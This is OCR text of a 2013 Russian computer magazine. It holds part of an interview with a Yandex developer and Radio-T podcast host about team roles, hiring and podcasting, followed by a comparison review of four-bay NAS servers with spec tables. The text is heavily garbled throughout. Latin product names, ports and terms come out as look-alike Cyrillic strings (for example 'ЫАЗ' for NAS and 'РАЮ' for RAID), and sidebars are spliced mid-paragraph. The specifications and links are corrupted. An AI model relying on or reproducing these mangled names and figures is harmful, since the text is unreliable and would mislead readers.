пользовались только безопасные компоненты, чтобы все было 
протестировано. 

Есть еще тестировщики. При- 
чем тестировщики есть разные, 
как функциональные (проверя- 
ющие все на соответствие заяв- 
ленной идее), так и тестировщики 
по нагрузке, которые так хорошо 
умеют проверить, не падает ли 
сервис под нагрузкой, что иногда 
приходится переписывать вообще 
все. 

Между всем перечисленным 
есть «клей». Этот человек назы- 
вается «менеджер проекта». Он — 
маршрутизатор сообщений, «чело- 
век с железными ногами», который 
бегает во все стороны и рассказы- 
вает всем, что происходит. 

А еще есть руководитель 
продукта. Эту должность может 
занимать любой из перечисленных 
людей. Он определяет, в какую сто- 
рону будет развиваться продукт. 
У него есть некое видение, он по- 
нимает концепцию в целом. 



РАДИО-Т 

Самый популярный 
русскоязычный Ы-іесН- 
п од каст, выходящий 
с 2006 года. На данный 
момент вышло более 
350 выпусков. Аудитория 
составляет примерно 
300 тысяч человек, около 
2000 человек слушает 
в прямом эфире. 

В основном для еже- 
недельных выпусков 
выбираются лайтовые 
темы о гаджетах и веб- 
сервисах, однако в начале 
каждого месяца делается 
самая мякотка — «гиков- 
ский» выпуск, в котором 
глубоко обсуждают 
разработку и системное 
администрирование. 



Обычно проект закреплен внутри какого-то направле- 
ния. К примеру, есть направление поиска, карт или коммуни- 
кационных сервисов. И наверху каждого проекта, как правило, 
находится руководитель какого-то направления. Он немножко 
направляет происходящее в нужную сторону. 

А бывает и так, что какой-то продукт делает один че- 
ловек. Такое бывало не раз. Короче говоря, в Яндексе вообще 
очень гибкое распределение ролей. 

КАК ВСЕ НАЧ И НАЛ ОСЬ 

Я хорошо помню, что в первый раз заинтересовался ком- 
пьютерами, когда понял, что это нечто противоречащее 
родителям. Родители всегда говорили мне, что нужно зани- 
маться вот юриспруденцией или медициной, а я случайно уви- 
дел на работе у родителей своего друга настоящие компьюте- 
ры. Впечатление, конечно, было непередаваемое. После этого 
я понял, что это не то, чего хотят мои родители, а значит — это 
то, что мне нужно! 

Увлечение было невероятное. Компьютер я тогда мог 
увидеть максимум раз в неделю, когда заходил в гости на ра- 
боту к родителям того самого приятеля. Все остальное время 




ОБИЛЬЕ 

СЕГАЛОВИЧЕ 

Невозможно оценить, 
кем был Илья для ком- 
пании. Он непросто со- 
основатель Яндекса — 
он был тем человеком, 
который выстроил тот 
самый дух компании. 

К примеру, как должны 
строиться отношения 
между разработчиками 
и менеджерами. Как 
должна строиться 
работа. Что правильно, 
а что нет 

Он принимал решения 
не только на начальном 
этапе, а до самого 
конца. Например, в его 
черновиках, которые 
он отправлял на узкую 
группулюдей, было одно 
из важных решений по 
изменению структуры 
разработки компании. 
Мы довели эту концеп- 
цию до ума и внедрили 
уже после его смерти. 

Он был человеком, 
который во многом 
определял, как 
будет развиваться 
компания сточки зрения 
технологий, сточки 
зрения продуктов. 
Единственное, чем Илья 
в глобальном смысле 
не занимался, — это 
инвестиционная состав- 
ляющая компании. Во 
все остальное Илья был 
погружен на полную. 




ХАКЕР 09 /176/ 2013 



у меня уходило на чисто теоретиче- 
ские изыскания. Никакого интерне- 
та тогда не было. 

У меня до сих пор сохрани- 
лась тетрадка, где я писал про- 
граммы от руки. Проверить их 
на реальном железе я не мог, по- 
этому я сам выполнял функции 
компьютера, то есть сам все про- 
считывал. А потом в какой-то мо- 
мент я случайно оказывался возле 
компьютера, доставал тетрадку 
и быстро все перенабивал, прове- 
рял, все ли в порядке, вносил ис- 
правления в код с обеих сторон — 
в то, что набрал, и в то, что написал. 
Было очень интересно. 

Моя первая работа в ІТ выгля- 
дела так: я писал Ьооііоасіег’ы. 
В тот момент буйным цветом на- 
чали цвести Зресітит’ы, и хуже 
того — появились первые Спектру- 
мы с дисководами. Пара компаний, 
которые тогда торговали в России 
дисками, начали понемногу выпускать собственные диски 
с подборками игр. Разумеется, все это был 100% ѵѵагег, пото- 
му что легально тогда ничего не продавалось. 

К дискам тогда модно было делать загрузчик — програм- 
му на ассемблере, которая запускается первой после того, 
как ты вставишь диск. Вот в то время я занимался серийным 
производством этих самых загрузчиков — красивых программ, 
с бегущей полоской, разноцветными бэграундами, все как поло- 
жено. И деньги оттуда шли неплохие. Хорошо помню, что на этих 
ЬооІІоасІег’ах я зарабатывал больше, чем отец на заводе. 

Впоследствии, работая программистом, я очень мно- 
го времени потратил на езду по разным странам: мне 
было просто интересно поездить. Брал короткие контракты 
и по несколько месяцев занимался распознаванием образов, 
работой со звуком, оцифровкой данных со спутников — коро- 
че говоря, массой разных интересных и не очень вещей. Мне 
просто хотелось поездить по миру. 

Это было увлекательно, но рано или поздно это долж- 
но было закончиться. В итоге, я сначала пошел заниматься 
АЗРЫпих (дочернее предприятие ЗѴѴЗоТІ;, которое теперь на- 
зывается РагаІІеІз), потом какое-то время работал сам на себя, 
а после знакомые ребята пригласили меня пойти в Яндекс. 

Образование у меня непрофильное, никакого отноше- 
ния к ІТ я не имею. По большому счету, никакой «тяги к ІТ» 
у меня не существует. Меня прет от двух вещей: от интересных 
технологий и от продуктов, которые могут принести пользу 
людям. 

Чтобы приносить пользу людям сейчас, приходится 
заниматься ІТ. Потому что это самый легкий способ досту- 
чаться до каких-нибудь 10-15 миллионов человек. Ведь Ян- 
декс — большая компания, здесь не бывает сервисов, которы- 
ми пользуется меньше миллиона человек. 



ѴАС’13 

Уже четвертый год 
подряд Яндекс прово- 
дит технологическую 
конференцию УаС(УеІ 
апоІИег СопТегепсе). 

В октябре 2013-го на 
секции «Безопасность» 
представители интернет- 
индустрии расскажут, 
как они защищают 
данные миллионов своих 
пользователей и какие 
крутые штуки можно 
сделать для безопасно- 
сти, когда есть «большие 
данные» (Ьідбаіа) и 
«большая математика» 
(ЫдтаФз). Зареги- 
стрироваться можно на 
еѵепіз.уапсіех.ги. 




КАК ПОПАСТЬ В ЯНДЕКС? 

Попасть на работу в Яндекс очень просто: нужно быть 
специалистом. В любой области. Где бы ты ни хотел рабо- 
тать, ты должен быть профи в этой области. Пока ты им не ста- 
нешь, ты вряд ли сюда попадешь. 

Но есть еще много разных вещей, по которым отсе- 
иваются люди. Кроме профессиональных навыков (то есть 
программист должен уметь программировать, знать алго- 
ритмы), важно и другое. Например, очень сложно работать 
с людьми, которые категорически не умеют общаться. 



Кто-то сейчас начнет кричать, что задача программи- 
ста — писать код, а не общаться. Но так не бывает. Не быва- 
ет, чтобы человек вообще не общался внутри команды. Если 
этого нет, скорее всего, часть этой команды делает одно, 
часть — совсем другое. Из-за этого рушится весь процесс 
разработки. 

Я часто говорю, что хороший программист может пи- 
сать код не более четырех часов в день. В остальное время 
у него уже выключается мозг, и он не в состоянии заниматься 
креативной деятельностью. На самом деле люди, которые ни- 
когда не программировали и не работали, считают, что четыре 
часа — это очень мало. Но это очень 
много. По собственному опыту 
знаю, что программировать четыре 
часа в день — это взрыв мозга. Мозг 
просто через уши вытекает. 

С собеседованиями у нас все 
довольно просто. Собеседова- 
ние делится на несколько этапов, 
проверяются разные скиллы: будь 



Никакой «тяги к ІТ» у меня не существу- 
ет . Меня прет от двух вещей: от инте- 
ресных технологий и от продуктов, кото- 
рые могут принести пользу людям 



>500 000 

ЧЕЛОВЕК СЛУ- 
ШАЮТ ПОДКАСТ 
«РАДИ0-Т». 

ИЗ НИХ ОКОЛО 
2000 ЧЕЛОВЕК 
СЛУШАЮТ ПОД- 
КАСТ В ПРЯМОМ 
ЭФИРЕ. 
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то умение общаться, умение ра- 
ботать в условиях стресса (потому 
что любое собеседование всегда 
стресс) или умение писать код. 

Бывают вакансии, где код 
писать не просят, но про- 
сят решить какую-то задач- 
ку. Не в смысле «сколько мячи- 
ков поместится на гору Фудзи», 
а какую-то реальную логическую 
задачу простого типа. Если берут 
человека, которого хотят взять 
потенциальным системным архи- 
тектором, ему предлагают спро- 
ектировать какой-нибудь сервис. 
Просто взять и крупными блоками, 
крупными мазками его обозна- 
чить. Так мы понимаем, подходит 
нам человек или нет. 




РАДИО-Т 

Аудитория подкаста уже боль- 
ше, чем на эфирном радио. 

Знаете, как-то я оказался на од- 
ном радио. Меня пригласили 
в утреннее шоу и спросили: «Ну 
а чем вы там в интернете занима- 
етесь?» Я рассказал, что мы де- 
лаем шоу и что у него аудитория 
больше их всего-то в четыре раза. 

Они ТАК обиделись: обида просто 
на лице читалась! 

Радио-Т — это шоу. Со всеми 
вытекающими последствиями. Оно 
часто бывает спланированным. На- 
пример, до начала мы чаще всего 
договариваемся, кто будет «за», 
а кто «против» определенной темы. 

Потому что если все будут «за», это 
будет плохо звучать. 

Иногда приходится созна- 
тельно, заготовив заранее, го- 
ворить глупости. Чтобы люди по- 
том полезли в интернет и начали 
рассказывать, какие мы все тупые. 

С одной стороны, это тяжело. Ду- 
маешь: «Блин, теперь все будут на- 
зывать меня тупицей!» С другой стороны, потом столько радо- 
сти, потому что понимаешь — люди не просто так что-то пишут, 
они пошли, подготовились, прочитали, рассказали нам, какие 
мы все тупицы, и почувствовали себя лучше и умнее. 

К подкастингу сложно уже относиться как к хобби. Не- 
давно я сидел и выписывал цифры о Радио-Т для доклада и об- 
наружил, что в этом году будет уже семь лет, как мы этим занима- 
емся. Ну как можно семь лет заниматься одним и тем же хобби? 

Нельзя сказать, что Радио-Т — проект некоммерче- 
ский. У нас есть аудиовставки, есть заказные темы (когда 
к нам приходят люди и просят обсудить их тему). Но есть важ- 
ный момент: Радио-Т — это очень жесткое шоу. Даже если 
ты спонсор некой темы, это не значит, что мы осветим ее пози- 
тивно. Единственное, что мы гарантируем, — это упоминание 
темы. Может быть, все обсуждение выльется в «да ну, фигня 
какая-то — кто это вообще придумал?». 

Запись мы ведем по Зкуре. Обычно весь поток соби- 
рается у одного из нас и напрямую транслируется в при- 
мерно полсотни транслирующих серверов. В онлайне нас 
слушает не так много людей — порядка двух тысяч человек. 



Какая-то часть этих людей сидит в чате и радостно пишет 
сообщения, что тоже невероятно увлекательный процесс. 
Там сложилась своя небольшая тусовка, есть очень умные 
люди, есть... менее умные. 

Когда мы выкладываем новый выпуск, толпа людей 
бросается его качать. Непосредственно с наших серверов 
качает около ста тысяч человек. Еще тысяч двести качают 
через различные торренты... В общем, у нас довольно боль- 
шая аудитория, и мы построили настоящий народный СОІМ, 
чтобы раздавать эти файлы. Поэтому когда ты приходишь 
на Радио-Т, чтобы скачать очередной выпуск, ты не знаешь, 
с чьего сервера на самом деле его скачиваешь. 

Конечно, буквально все нам говорят, что очень нужно 
видео, но видео продакшен очень дорог. Взять хотя бы че- 
ловеческие ресурсы. Нужно нанимать оператора плюс чело- 
века, кто будет сидеть «на эфире», — оператора эфира, кото- 
рый будет подкладывать нужные картинки, пока мы говорим. 
А излишне напрягаться не хочется. У всех есть другая работа, 
и выкладываться настолько в рамках этого побочного проек- 
та — сложно. 



>5000 

ЧЕЛОВЕК РАБО- 
ТАЮТ В ОФИСАХ 
ЯНДЕКСА, 
РАСПОЛОЖЕН- 
НЫХ В СЕМИ 
СТРАНАХ МИРА. 



Радио-Т — очень жесткое шоу . Даже если 
ты спонсор темы, это не значит, что мы 
осветим ее позитивно . Единственное, 
что гарантируем, — упоминание темы 



Это просто большое дело. 

Каждый преследует что-то свое, 
понятное, и чаще всего этого дости- 
гает. Моя цель — сделать так, чтобы 
люди, сосредоточенные вокруг это- 
го шоу, становились умнее, образо- 
ваннее и чаще обращали внимание 
на то, что происходит. И мне кажет- 
ся, помогает. НЕ 








ЫА34РІІЫ 

СРАВНИТЕЛЬНОЕ ТЕСТИРОВА- 
НИЕ ЧЕТЫРЕХДИСКОВЫХ ИАЗ 

Четырехдисковые ЫАЗ-серверы — серьезные Сергей Плотников 
решения. А потому критерии выбора данно- 
го устройства должны быть взвешенными. 

И если ты надумал приобрести такое храни- 
лище, то наш сравнительный тест тебе 
в помощь! 




МЕТОДИКАТЕСТИРОВАНИЯ 

Для измерения производительности ЫАЗ мы ис- 
пользовали уже проверенный временем бенчмарк 
ІпіеІ ЫА5 РегТогтапсе ТооІкИ: (ІпіеІ ЫАЗРТ). Он спо- 
собен как следует нагрузить сетевое хранилище: 
от банального копирования файлов и папок 
на сетевой диск до потокового воспроизведения 
и записи НЮ-видео. Для того чтобы узнать макси- 
мальную производительность четырехдисковых 
серверов, мы установили винчестеры в режим 
РАЮ 0. А вот массив РАЮ 5, в свою очередь, про- 
демонстрировал нам, насколько быстро система 
справляется с чередованием и «невыделенным 
диском четности». 

Следом за скоростными показателями 
устройства оценивалась добротность прошив- 
ки: набор утилит и сервисов, время отклика веб- 
интерфейса и его интуитивность, — все это очень 
важно при выборе готового ЫАЗ. На наш тестовый 
ПК, а также на все сетевые хранилища с сайтов 
производителя были установлены последние вер- 
сии вспомогательных программ и прошивок. 





Реггит 
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АЗІІЗТОР А5-604Т 



Внешне АЗ-604Т выглядит лаконично, 
устройство спокойно впишется в рам- 
ки любого интерьера. Передняя панель 
пластиковая, но имеет матовую фактуру. 
Из примечательных особенностей отме- 
тим наличие 115В 3.0 порта с клавишей 
быстрого резервного копирования, на- 
личие двухстрочного матричного дис- 
плея и кнопок управления. Индикация 
активности жестких дисков реализована 
через диоды, расположенные на съем- 
ных корзинах для НЮО. В настройках 
всегда можно изменить уровень яркости 
как экрана, так и индикаторов. Задняя 
панель АЗ-604Т напоминает І/О-панель 
любой более-менее современной материнской платы: хранилище может 
похвастать сразу двумя Ри-45, пятью 115В (один — третьей ревизии), двумя 
еЗАТА и НЮМІ. Последний позволит использовать данный ЫАЗ в качестве 
сетевого плеера (благо АЗ-604Т оснащен аддоном Вохее). Также на задней 
панели есть трехконтактный штекер для подключения кабеля питания (блок 
питания у А5-604Т встроенный) и решетка для 120-миллиметрового венти- 
лятора. «Карлсон» имеет стандартный 4-пиновый разъем, в настройках мож- 
но регулировать частоту вращения. Во всех режимах система охлаждения 
девайса работает бесшумно. 

С установкой винчестеров и настройкой параметров сети проблем 
не возникнет. Для этого потребуется установить программу Сопітоі Сепіег. 
Далее утилита сразу же предложит зарегистрироваться и получить соб- 
ственный Ю. В дальнейшем он понадобится при установке дополнительных 
приложений. 

Веб-интерфейс А5-604Т — АйМ (АЗІІЗТОР Оа1:а Мазіег) — дружелюбен 
и отзывчив. Внешне напоминает рабочий стол смартфона, а по функциона- 
лу соответствует передовым достижениям ОС конкурентов — долгожителей 
рынка. Что же касается наполнения операционной системы, то тут есть все, 
что должно уметь топовое устройство. К тому же ты можешь самостоятель- 
но установить дополнительные приложения. На момент написания статьи их 
более 90. Неплохо для компании, которая была основана в 2011 году! 

В целом следует отметить, что АЗІІЗТОР способна предоставить поль- 
зователю высокопроизводительные, многофункциональные решения. К не- 
достаткам можно отнести небольшое число поддерживаемой компьютерной 
периферии. Однако с выходом новых прошивок АРМ все наладится. 



о 

большая аппаратная 
поддержка хранилища, 
есть 115В 3.0 
высокая 

производительность 
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веб-интерфейс 
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О 

тестовые МФУ работали 
только в режиме печати 
малое число поддержки 
ІР-камер 



ВЦРРАЮ ІЖЗТАТІОМ 
РРО СНШ 

В нашу лабораторию прибыл ЫАЗ под 
номером І_5-ОѴ4.0ТІ_/В5-ЕІІ, а это зна- 
чит, что он «запакован» четырьмя тера- 
байтными винчестерами. Но в продаже 
можно найти модели І_5-ОѴ8.0ТІ_/В5-ЕІІ 
и І_5-ОѴ12ТІ_/В5-ЕІІ с общей емкостью 
дискового пространства 8 Тб и 12 Тб со- 
ответственно. Во всех случаях использу- 
ется одно и то же железо. Наше тестиро- 
вание показывает, что процессор МагѵеІІ 
обладает весьма высокой производи- 
тельностью. 

Передняя панель ЫпкЗіаІіоп Рго ОиасІ 
пластиковая. Здесь расположен один 
порт 115В 2.0 для подключения внешних накопителей и резервирования дан- 
ных (клавиша РипсИоп). Также есть двухцветный индикатор активности хра- 
нилища и индикаторы активности работы накопителей. 

На задней панели расположен еще один 115В 2.0 и порт ЕІНегпеІ: от ги- 
габитного сетевого контроллера. Есть тумблер активности ІМАЗ’а. В поло- 
жении Аиіо при бездействии устройство может самостоятельно «уснуть». 
За охлаждение винчестеров отвечает небольшой вентилятор. Работает 
«карлсон», на наш взгляд, достаточно шумно. 

Для того чтобы добраться до жестких дисков, необходимо снять пласти- 
ковую переднюю панель, а затем извлечь салазки. В нашем случае были 
установлены четыре жестких диска ѴѴезіегп Оіді1:аІ Ѵ\Ю10ЕАВ5 серии Саѵіаг 
Сгееп. По умолчанию используется массив РАЮ 5, однако хранилище под- 
держивает и другие массивы хранения данных, за исключением РАЮ 6. 

Веб-интерфейс ЫпкЗІаІіоп Рго ОиасІ, пожалуй, можно назвать самым кон- 
сервативным. Внешне «админка» напоминает классическое окно с несколь- 
кими вкладками, в то время как модным трендом становится использование 
импровизированного рабочего стола. В наличии следующие меню: «Общие 
папки», «Пользователи/группы», «Сеть», «Система» и «Расширения». 

Для обновления ОС ЫпкЗІайоп Рго ОиасІ требуется скачать полноценное 
приложение. После запуска ЕХЕ-файла лишь необходимо подождать, пока 
программа перепрошьет устройство. ЫпкЗІаІіоп Рго ОиасІ может похвастать 
поддержкой медиасервера, ВИТоггепі, Тіте МасІііпе, іТипез, принт-сервера, 
ІМоѵаВАСКІІР и ѴѴеЬАссезз, фирменного облачного сервиса. 

ВиТ^аІо ипкЗІаІіоп Рго ОиасІ — устройство из коробки. Нужно лишь до- 
стать І\ІАЗ, подключить к сети и пользоваться в свое удовольствие. 
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МЕТСЕАР 

кшооо-гооЕік 

Передняя панель устройства выполне- 
на из глянцевого пластика. В верхней 
части расположены клавиша включе- 
ния/отключения устройства, индикато- 
ры активности работы жестких дисков, 
а также порт 115В 2.0 и кнопка Ьаскир. 
Центральная часть отведена под доки 
для винчестеров. Используются клас- 
сические выдвижные салазки. В ниж- 
ней части расположен двухстрочный 
дисплей без органов управления. В мо- 
менты работы он оповещает пользователя о том или ином процессе: пе- 
резагрузке системы, проверке ИЭО, форматировании и так далее. Задняя 
панель хранилища оснащена удобной ручкой для переноски. За отвод го- 
рячего воздуха из внутреннего пространства ІМАЗ’а отвечает небольшой, 
но шумный вентилятор. Здесь же, на «корме», нашлось место для двух 
портов 115В 3.0 и одного Ри-45. Есть возможность обезопасить устройство 
при помощи кенсингтонского замка. 

За производительность ВеасІуІМАЗ ІЧѴ+ ѵ2 отвечает процессор МагѵеІІ 
Агтасіа ХР, функционирующий на частоте 1,6 ГГц. Сам камень не греется, 
и для его охлаждения хватает алюминиевого «гребешка» высотой всего один 
сантиметр. Наклеены радиаторы и на ОЗУ. В системе используется лишь 
256 Мб «мозгов» без возможности дальнейшего апгрейда. 1\1А8 состоит 
из двух плат: основной со всеми процессорами и контроллерами и дискрет- 
ной, со слотами 5АТА, подключаемой по интерфейсу РСІ Ехргезз х4. 

После установки жестких дисков и сканирования накопителей ВАЮаг вы- 
дал ошибку Соггирі ПооГ Пришлось перезагружать 1\1А8 и ждать, пока диски 
будут проверены. Настройка массивов производится только при помощи 
ВАЮаг. В случае с РАЮ 5 придется подождать несколько часов, пока все ди- 
ски будут проверены. Однако в это время можно спокойно, хотя и медленно 
работать с сервером. 

Веб-интерфейс ВІ\Ю4000-200ЕІІ8 — ВАЮіаіог Ѵ5 — классический. Пред- 
лагаем ссылку с аддонами: сІск.ги/8сиІІз . Среди интересных программ 
можно найти ОѴВЫпк, превращающий 1МАЗ в видеорекордер, ВеасІуМАЗ 
ЗигѵеіІІапсе, при помощи которого можно управлять ІР-камерами, и Едпуіе 
СІоисІ Рііе Зегѵег — облачный сервис, без которого сегодня не обходится 
ни один 1МАЗ ( сІск.щ/8сиаС ). 

ВеасІуМАЗ МѴ+ ѵ2 может как поставляться без дисков, так и комплекто- 
ваться предустановленными винчестерами общим объемом 2 и 4 Тб. 
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ОМАР 

Т8-469 РРО 

Т5-469 Рго построен на базе процессо- 
ра Іпіеі Аіот 02700. Камень работает 
на частоте 2133 МГц, имеет два физи- 
ческих ядра, четыре потока (спасибо 
Нурег-ТІігеасІіпд). Для МАЗ это топовое 
решение. Действительно, производи- 
тельность «атома» настолько велика, 
что в некоторых тестах Т5-469 Рго до- 
стигает потолка пропускной способности 
гигабитной сети. По умолчанию в Т5-469 
Рго один гигабайт ОЗУ, но объем можно 
расширить до 3 Гб. Используются модули формата ЗОЮІММ. 

На передней панели помимо четырех отсеков для установки жестких 
дисков (под ключ) есть дисплей, кнопка Роѵѵег и 115В 2.0 порт с функцией 
резервного копирования. Рядом с І_ЕО есть «качелька» управления экраном. 
Из дополнительных информационных элементов можно отметить индикато- 
ры активности жестких дисков, а также «мигалки» ЗіаШз, І_АМ, 115В, еЗАТА. 
Салазки для накопителей поддерживают как 3,5-дюймовые, так и 2,5-дюй- 
мовые накопители. 

Задняя панель Т5-469 Рго напоминает І/О какой-нибудь материнской пла- 
ты. Разве что вентиляторы в наличии. Один предназначен для охлаждения на- 
копителей, второй — для охлаждения встроенного блока питания. Работают 
они бесшумно. Итогохранилище может похвастать парой РЗ-45, шестью 118В, 
два из которых последней, третьей ревизии, и два еЗАТА. МАЗ имеет сразу 
три видеовыхода: один ѴСА для обслуживания хранилища и НЮМІ для под- 
ключения, например, к телевизору. Предусмотрен замок типа Кепзіпдіюп. 

Можно с уверенностью сказать, что у Т8-469 Рго среди участников тести- 
рования в плане функционала конкурентов нет. 

Ничем не хуже и программная составляющая устройства. На момент на- 
писания статьи была актуальна прошивка ТигЬоІМАЗ 3.8. «Фирмвар» может 
похвастать полной поддержкой ѴѴіпсІоѵѵз 8. Ознакомиться с функциями и веб- 
интерфейсом можно при помощи демоприложения: дпар.ги/сіето . 

Небольшой апдейт. К моменту выхода этого номера в печать запланиро- 
вано обновление «фирмвара» до версии 4.0. У новой прошивки кардинально 
поменялся внешний вид. Веб-интерфейс ТигЬоМАЗ 4.0 напоминает скорее 
полноценную операционную систему для мобильных устройств. Есть рабочий 
стол с множеством иконок. Открытие любой вкладки фиксируется подобно 
вкладкам интернет-браузера. В итоге любой сервер ОЫАР может заменить 
сетевой плеер или НТРС. 
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всевозможных 
внешних устройств 

О 

не обнаружено 
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ЗУИОЮСУ 
йІЗШАТІОМ 034131 

Комплектация 03413І стандартна: 
внешний блок питания, патч-корд, 
винты для крепления жестких дисков 
и компакт-диск с ПО. Корпус храни- 
лища — самый необычный среди всех 
участников тестирования. Лицевая па- 
нель и дно выполнены из белого пласти- 
ка, а остальная часть каркаса — из алю- 
миния. 08413) наверняка приглянулся 
тебе. На наш взгляд, ЫАЗ будет гармо- 
нично смотреться вместе с продукцией 
компании Арріе. Есть небольшой не- 
достаток: пластик глянцевый, а потому 
собирает пыль и отпечатки пальцев. 
На передней панели кроме клавиши 
включения есть индикаторы активности 
жестких дисков, І_АЫ и ЗіаШз. Здесь рас- 
положены воздуховоды, через которые 
воздух всасывается и выходит через заднюю панель. 

На задней панели, кстати, расположены пара портов ІІЗВ 2.0, РМ-45 
и разъем для подключения блока питания. К сожалению, нет поддержки 
ІІЗВ 3.0, но она реализована у старшей модели 03413. 

В 03413І два вентилятора, бесшумно работающие на выдув. За вре- 
мя тестирования жесткие диски прогрелись до 41 градуса. Для того чтобы 
установить диски, необходимо открутить четыре винта и опустить заднюю 
крышку. Не очень удобно. После этого мы получаем доступ к пластиковым 
корзинам, которые имеют крепежные отверстия как для 3,5-дюймовых, так 
и для 2,5-дюймовых запоминающих устройств. После установки дисков 
03413І в течение минуты загружается. 

При нажатии на клавишу «Подключиться» через браузер мы попадаем 
в веб-интерфейс. Зупоіоду всегда славилась своими качественными про- 
шивками, и 08413І имеет огромнейший функционал. Главная особенность 
любой йЗМ четвертой версии — поддержка облачных услуг. Конкретно 
при помощи 03413І ты можешь создать собственное облако, которое будет 
автоматически синхронизироваться между компьютерами и мобильными 
устройствами. Второй момент — это, конечно же, поддержка ряда муль- 
тимедийных функций: использование видео-, аудио- и фотоконтента. Про- 
изводительности хранилища хватит, чтобы одновременно записывать ТВ- 
программу через ІІЗВ-тюнер и воспроизводить НЮ-поток. 



О 

поддержка большого 
числа накопителей 
большой функционал ОЗМ 
поддержка облачных 
технологий 
большое число 
дополнительных пакетов 
доступная стоимость 

Ф 

нетІІЗВЗ.О 

габаритный внешний блок 
питания 

не совсем удобная схема 
замены дисков 
все порты выведены через 
заднюю панель 




ТНЕШ 
М4800ЕСО 

Модель Ы4800Есо является проапгрей- 
женной версией сетевого хранилища 
N4800. Улучшенный ЫАЗ потребля- 
ет до 20% меньше энергии. При этом 
за термоконтроль СРІІ и логики отвечает 
полностью пассивная система охлажде- 
ния. Мы же с удовольствием отметим, 
что работает Ы4800Есо практически 
бесшумно. 

Интересная фишка Ы4800Есо — на- 
личие слотов расширения. На плате есть 
«свободный» порт РСІ Ехргезз хі (без 
перемычки) и тіпі-РСІ Ехргезз, которые ты можешь использовать по своему 
усмотрению. Например, для установки еще одной сетевой карты. 

Передняя панель М4800Есо выполнена из пластика. Для установки жест- 
ких дисков необходимо приоткрыть дверцу и закрепить накопители в специ- 
альных салазках. Есть возможность «запереть» их под ключ. На передней 
панели расположено сразу два ІІЗВ-порта третьего поколения. Здесь же 
расположено два дисплея. Один отслеживает состояние активности винче- 
стеров и сети. Второй демонстрирует конкретные настройки ЫАЗ’а. 

В системе используется всего один вентилятор. Также на задней панели 
расположены еще два ІІЗВ (только уже второй версии), еЗАТА и два Ри-45. 
Из видеовыходов отметим доисторический ѴСА, который может пригодить- 
ся скорее для обслуживания устройства, и НЮМІ. В отличие от остальных 
ЫАЗ, у Ы4800Есо предусмотрен 3,5-миллиметровый линейный выход. 

После настройки параметров подключения к сети мы можем обратиться 
к веб-интерфейсу. Можно использовать традиционную «двухмерную» визу- 
ализацию ТНесизОЗ 5.0, а можно «трехмерную», построенную на обыкно- 
венном движке РІазІі. Во втором случае админка выглядит более привлека- 
тельной. Но для нас это не принципиально. Прошивка представлена в виде 
классического дерева с девятью вкладками. Есть возможность установки 
стандартных приложений и модулей. На момент написания статьи с офици- 
ального сайта компании можно было скачать и установить 20 модулей рас- 
ширения. Есть и приложения для мобильных гаджетов на базе АпсІгоісІ и ЮЗ. 
Попробовать веб-интерфейс «на вкус» всегда можно, воспользовавшись 
онлайн-демонстрацией: с!ск.ги/8сІХі . 

В целом функционал хранилища полностью соответствует топовому ре- 
шению. Радует большой список поддерживаемых внешних устройств, будь 
то принтеры, ІІРЗ’ы или же внешние накопители. 
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слоты расширения для 
дискретных устройств 
высокая 

производительность 
много І/О 

бесшумная работа 
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NАЗ еНесі 



39 



ТЕХНИЧЕСКИЕ 

ХАРАКТЕРИСТИКИ 



Процессор: 

Память: 

Интерфейсы: 

Уровни массивов: 
Поддерживаемые протоколы: 

Поддерживаемые сервисы: 



Возможная комплектация: 



О» 




А51І5ТОР А5-604Т 



ІпІеІАЮт 02700, 2,13 ГГц 
00РЗ, 1 Гб 

2 х Ри-45 (10/100/1000 Мбит/с), 

2 х 115В 3.0, 4 х 115В 2.0, 2 х еЗАТА, 1 х НОМІ 

РАЮ 0/1/5/6/10, ЗВОЭ 

АРР, РТР, НТТР/НТТР5, ІЗСЗІ, Рзупс, 55Н, 

5 РТР, 5МВ/СІР5, ѴѴеЬОАѴ 
медиасервер, принт-сервер, сервер 
видеонаблюдения, веб-сервер, сервер іТипез, 
Вохее, ВіІТоггепІ, Тіте МасЬіпе 
без дисков 




ВиНаІо ЫпкЗІаІіоп Оиасі 



МагѵеІІ, 1,6 ГГц 
ООВЗ 

1 х РЗ-45 (10/100/1000 Мбит/с), 

2 х 118В 2.0 

РАЮ 0/1/5/10, ЗВСЮ 

АРР, Вопіоиг, РТР/5 РТР, НТТР/НТТР5, 5МВ/ 
сіР5, тср/ір, иРпР 

медиасервер, принт-сервер, сервер іТипез, 
ВіІТоггепІ, Тіте МасЬіпе, ІМоѵаВАСКІІР, 
ѴѴеЬАссезз 
4 Тб, 8 Тб, 12 Тб 




ЫЕТСЕАВ РМ04000-200ЕІІ5 



Процессор: МагѵеІІ, 1,6 ГГц 
256 Мб 

1 х РЗ-45 (10/100/1000 Мбит/с), 2 х изв 3.0, 

1 х ИЗВ 2.0 

Х-РАЮ2, ПАЮ 0/1/5, ЗВСШ 

АРР, Вопіоиг, РТР, НТТР/НТТР5, ІМР5, 5МВ/СІР5, 

УРпР І5С5І, Теіпеі, 55Н, 5ІММР, ТРТР 

медиасервер, принт-сервер, сервер 

видеонаблюдения, ВіІТоггепІ, Тіте МасЬіпе, 

сервер іТипез 

без дисков, 2 Тб, 4 Тб 




Процессор: 

Память: 

Интерфейсы: 



Уровни массивов: 
Поддерживаемые протоколы: 



Поддерживаемые сервисы: 



Возможная комплектация: 



(ЭЫАРТ5-469 Рго 

ІпІеІАЮт 02700, 2,13 ГГц 
ООВЗ, 1 Гб 

2 х ВО-45 (10/100/1000 Мбит/с), 

2 х ИЗВ 3.0, 5 х ИЗВ 2.0, 2 х е 5АТА, 1 х ѴСА, 
1 х НОМІ 

РАЮ 0/1/5/6/10, ЗВСЮ 

СІР5/5МВ, АРР, ІМР5, РТР, НТТР, НТТР5, Теіпеі, 
55Н, ІЗСЗІ, 5ІММР, [ІРпР, Вопіоиг, ѴѴеЬОАѴ, 
оичА 

медиасервер, принт-сервер, сервер 
видеонаблюдения, медиапортал, веб-сервер, 
сервер іТипез, ВіІТоггепІ, Тіте МасЬіпе 
без дисков 



Зупоіоду ОізкЗіаііоп 03413] 

МагѵеІІ, 1,6 ГГц 
ООВЗ, 512 Мб 

1 х ВѵМ5 (10/100/1000 Мбит/с), 

2 х 115В 2.0 

5Н РАЮ, РАЮ 0/1/5/6/10, ШО 
СІР5, АРР, РТР, ІЗСЗІ, Теіпеі, 55Н, ІМР5, 
ѴѴеЬОАѴ, 5ИМР, Рзупс, НТТР/НТТР5 

медиасервер, принт-сервер, сервер 
видеонаблюдения, ѴѴеЬ 51а1іоп, ВіІТоггепІ/ 
еМиІе, Тіте Васкир 
без дисков 



ТИесиз ІЧ4800Есо 

